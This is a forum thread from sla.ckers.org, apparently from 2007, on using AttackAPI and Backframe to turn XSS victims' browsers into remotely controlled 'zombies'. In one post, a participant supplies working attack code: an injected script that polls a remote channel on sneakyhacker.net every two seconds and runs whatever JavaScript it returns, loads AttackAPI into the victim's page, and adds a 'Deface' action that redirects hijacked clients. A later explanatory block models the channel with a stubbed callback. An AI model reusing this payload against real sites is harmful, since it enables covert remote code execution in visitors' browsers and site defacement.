Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
AttackAPI
Posted by: jamuse
Date: October 18, 2007 08:49AM

I'd like to use AttackAPI to demonstrate similar functionality to xss-proxy. After reading Chapter 7 of the XSS attacks book and
http://www.gnucitizen.org/blog/persistent-bi-directional-communication-channels,
I still have the following questions:

1. When exploiting an XSS vuln what do I need to include in the payload to
zombiefy the victim browser?

2. I tried the controlling zombies example from the "XSS Attacks"
book: I opened firetest-interactive.htm on one browser and in the
Firebug console I typed: $A.zombiefy('http://localhost/channel.php');
I then opened another tab in firefox and sent the following request:
http:||localhost/channel.php?action=push&message=alert('Hi There!')
I did not see an alertbox with the message. What am I missing?

3. As mentioned above my end goal is to use $A.hijackView() to
transfer the victim browser view to another URL. How do I push such a
request to the victim browser?

Re: AttackAPI
Posted by: rsnake
Date: October 26, 2007 11:47AM

Good question for PDP who wrote it! You should probably PM him: http://sla.ckers.org/forum/profile.php?13,156

- RSnake
Gotta love it. http://ha.ckers.org

Re: AttackAPI
Posted by: jamuse
Date: October 28, 2007 10:41AM

Thanks, I tried emailing PDP, PMing, and even posted to the AttackAPI mailing list, but no dice. I did make some progress, though; perhaps this may shed a little light on the problem. After I zombiefy a client, that client sends requests to /undefined, which results in a 404 (the full request is shown below).


(hxxp://localhost/undefined?action=pull&callback=AttackAPI.dom.spawnChannel.channels%5B0%5D.onpull&referrer=http%3A//localhost/xss.php%3Fxss%3D%253Cscript%2520src%3D%2522http%3A//localhost/attackapi/build/build/AttackAPI-standalone.js%2522%253E%253C/script%253E%253Cscript%253E%24A.zombiefy%28%27http%3A//localhost/attackapi/inf/channel.php%27%29%3B%253C/script%253E&__r=0.11533011800075277_1193523713500)


I imagine that the client should be requesting the /attackapi/inf/channel.php file instead, though I'm not sure why it's requesting /undefined. Any ideas?

Re: AttackAPI
Posted by: pipes
Date: November 07, 2007 09:45PM

This is a little something I drafted a while ago (modified); it may be of help. Please note this is a quick edit. The details are fake and it was written as a demo only :)

%%% The Payload %%%

In order to get backframe and AttackAPI working, you need to drop a payload. In this case we used a stock standard HTML file with a source element:

<!-- begin fun.html -->
<html>
<head>
<title>!</title>
<script type="text/javascript" src="sneakyhacker.js"></script>
</head>
<body>
You know, you are a fucking moron. End of discussion. -- George Ou to Peter Gutmann.
</body>
</html>
<!-- end fun.html -->

Taking a look at sneakyhacker.js (unobfuscated), there are two things. One is the connection (with a 2-second refresh) to our channel.php; the second is the loading of AttackAPI:

// begin JS
setInterval(function () {
    // Poll our channel every 2 seconds; the response body is whatever JS
    // the channel has queued for this client, executed as it loads.
    var pull = document.createElement("script");
    pull.src = 'http://sneakyhacker.net/channel/channel.php?action=pull'; // our channel
    pull.defer = true;
    pull.type = 'text/javascript';
    pull.onload = function () {
        document.body.removeChild(pull); // drop the tag once it has run
    };
    document.body.appendChild(pull);

    // Load AttackAPI into the victim's page (prob should make that a more
    // stealthy name at some stage ;D)
    var api = document.createElement("script");
    api.src = 'http://sneakyhacker.net/channel/AttackAPI-standalone.js';
    api.defer = true;
    api.type = 'text/javascript';
    api.onload = function () {
        document.body.removeChild(api);
    };
    document.body.appendChild(api);
}, 2000);
// end JS

When loading the above HTML file, we now have the client (with unique identifier) connecting to our channel on sneakyhacker.net every 2 seconds asking us for more instructions. We also have AttackAPI loaded into their browser. So now, we can call AttackAPI functions like so:

AttackAPI.<function>(<options>);


%%% The Attack Console %%%

The backframe attack console is located at http://sneakyhacker.net/backframe/application.htm . Pretty boring looking (and also an unstable version!!!) but there are some things you can do:

1) Access the channel, and get a list of clients:

- click add channel
- give it any name
- channel url: http://sneakyhacker.net/channel/channel.php

2) have a poke around the clients when they list.

3) Send a message to the client:

- Example message: alert('Oh hai!');

All in all, that isn't really that powerful. Backframe is a framework,
like metasploit it contains some 'fun' modules (or actions as they are
called), but you can't really do a lot with 'send message'. The
solution? Write your own actions :) Below is a quick defacement action
I wrote. Simply copy and paste the code into the shell (open shell),
and then when you look at the client list (click off the current
client first) a new action 'Deface' will appear. Punch in the url, hit
go and you then profit etc etc etc...

Example action:


Backframe.actions['Deface'] = function (channel, client, action) {
    $('#interactive-pane').fadeOut(null, function () {
        // Replace the pane with a one-field form: URL, Deface, Clear
        $(this).html('<form><label>URL</label><br/>' +
            '<input type="text" name="Deface" id="Deface" style="width:100%;"/><br/>' +
            '<input value="Deface" type="button"/> ' +
            '<input value="Clear" type="button"/></form>');
        // The inputs sit inside the <form>, so use find() rather than children()
        $(this).find('input[value="Deface"]').click(function () {
            // Push a location change to the selected client over the
            // interactive channel; the URL is JS-escaped so a quote in it
            // cannot break out of the pushed statement
            channel.interactive_channel.push(client.value,
                'window.location = ' + JSON.stringify($('#Deface').val()) + ';');
        });
        $(this).find('input[value="Clear"]').click(function () {
            $('#Deface').val('');
        });
        $(this).fadeIn();
    });
};

Cheers,
-P
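Because the thread never shows channel.php itself, here is an added example (constructed for this page; it is not AttackAPI's, Backframe's or PDP's code) that models the push/pull exchange the posts above describe: the console pushes a JavaScript string for a client, the zombie polls `channel.php?action=pull&callback=...`, and the response is JSONP that hands the message to the named callback, here a stub of `AttackAPI.dom.spawnChannel.channels[0].onpull` that only records what it received instead of evaluating it. The client id, the URLs and the stub object are assumptions. It also shows, in `naivePullUrl`, how concatenating an unset channel URL yields the `undefined?action=pull...` request shape from the earlier 404 post; whether that is what AttackAPI did in that case is not established here, and `buildPullUrl` is the check that refuses to poll without a channel URL.

```javascript
// Added example (not AttackAPI or Backframe code): a minimal in-process model
// of the push/pull channel described in the thread. The channel store, the
// URL builders and the stubbed AttackAPI callback object are all constructed
// here for illustration; the real channel.php and $A.zombiefy are not shown.

// Server side: one message queue per client. push() is what the attack
// console (or the ?action=push request in the thread) calls; pull() is what
// the zombie's <script src="channel.php?action=pull&callback=..."> hits.
class Channel {
  constructor() { this.queues = new Map(); }

  push(clientId, message) {
    if (!this.queues.has(clientId)) this.queues.set(clientId, []);
    this.queues.get(clientId).push(message);
    return this.queues.get(clientId).length;      // pending count after push
  }

  // Returns the JavaScript text the zombie will execute. JSONP style: the
  // queued message is passed to the named callback as a string literal, so
  // the callback (onpull), not the transport, decides whether to eval it.
  pull(clientId, callback) {
    const queue = this.queues.get(clientId) || [];
    const message = queue.shift();
    if (message === undefined) return '';        // nothing pending
    return `${callback}(${JSON.stringify(message)});`;
  }
}

// Zombie side: how the pull URL is assembled. Naive concatenation with an
// unset channel URL reproduces the "undefined?action=pull..." shape seen in
// the thread (an illustration of the mechanism, not a diagnosis of AttackAPI).
function naivePullUrl(channelUrl, callback) {
  return channelUrl + '?action=pull&callback=' + callback;
}

// The check a practitioner wants: refuse to poll without a channel URL.
function buildPullUrl(channelUrl, clientId, callback) {
  if (typeof channelUrl !== 'string' || channelUrl.length === 0) {
    throw new Error('channel URL is not set; refusing to poll "undefined"');
  }
  const params = new URLSearchParams({ action: 'pull', id: clientId, callback });
  return `${channelUrl}?${params.toString()}`;
}

// Stand-in for the callback object named in the thread's pull request
// (AttackAPI.dom.spawnChannel.channels[0].onpull). This onpull only records
// what it received; the real one would evaluate the message.
function makeAttackApiStub(received) {
  return {
    dom: { spawnChannel: { channels: [{ onpull: (m) => received.push(m) }] } }
  };
}

const CALLBACK = 'AttackAPI.dom.spawnChannel.channels[0].onpull';

// One poll: fetch the pull body and evaluate it the way a <script> element
// would, with AttackAPI resolved to our stub. Returns how many messages this
// poll delivered (0 or 1).
function zombiePoll(channel, clientId, attackApi) {
  const body = channel.pull(clientId, CALLBACK);
  if (body === '') return 0;
  new Function('AttackAPI', body)(attackApi);
  return 1;
}

// The exchange from the first post (push alert('Hi There!'), zombie polls,
// onpull receives that string) followed by a Deface-style payload whose URL
// is JSON-escaped so a quote in it cannot break out of the pushed statement.
function demo() {
  const channel = new Channel();
  const received = [];
  const stub = makeAttackApiStub(received);
  const clientId = 'zombie-1';                          // constructed id

  channel.push(clientId, "alert('Hi There!')");
  const defaceUrl = 'http://example.org/?x="';          // constructed, has a quote
  channel.push(clientId, 'window.location = ' + JSON.stringify(defaceUrl) + ';');

  const delivered = [];
  for (let i = 0; i < 3; i++) delivered.push(zombiePoll(channel, clientId, stub));
  return { received, delivered };                       // delivered: [1, 1, 0]
}
```

Run it with `node` and call `demo()`: the third poll returns 0 because the queue is empty, which is exactly the idle state the 2-second polling loop in the payload above spends most of its time in. Note the encoded callback in `buildPullUrl`'s output, `channels%5B0%5D.onpull`, matches the form of the request quoted in the 404 post.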

Re: AttackAPI
Posted by: pipes
Date: November 07, 2007 09:50PM

Forgot to add credit where credit due. PDP for writing the stuff and various google results for showing how backframe works ;)
